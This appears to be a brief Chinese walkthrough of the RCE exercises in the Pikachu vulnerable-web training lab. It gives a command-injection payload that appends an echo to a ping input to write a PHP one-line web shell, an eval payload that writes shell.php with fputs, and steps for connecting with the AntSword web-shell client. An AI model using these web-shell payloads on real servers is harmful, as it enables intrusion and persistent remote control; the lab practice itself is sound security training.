Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
中科三方15 分钟前
域名转移详细指南:流程、材料、注意事项和常见问题全解析
网络·安全
珠海西格25 分钟前
光伏电站全景感知体系:数据采集与设备状态监测技术
大数据·运维·服务器·数据库·人工智能
大黄说说1 小时前
深入理解 Linux 权限机制:文件、用户与访问控制全解析
linux·运维·服务器
2301_772204281 小时前
Linux 驱动开发:杂项设备驱动与自动设备号管理
linux·运维·驱动开发
黄昏晓x1 小时前
Linux----缓冲区
linux·运维·服务器
2501_901147831 小时前
学习笔记:单调递增数字求解的迭代优化与工程实践
linux·服务器·笔记·学习·算法
2501_924878732 小时前
AdAgent 能力成熟度模型:从 L1 自动化到 L5 自主增长引擎
运维·自动化
寄存器漫游者2 小时前
Linux 软件编程 命令、内核与 Shell
linux·运维·服务器
Kaede62 小时前
服务器硬件防火墙和软件防火墙的区别
运维·服务器
qinyia2 小时前
通过本地构建解决Cartographer编译中absl依赖缺失问题
linux·运维·服务器·mysql·ubuntu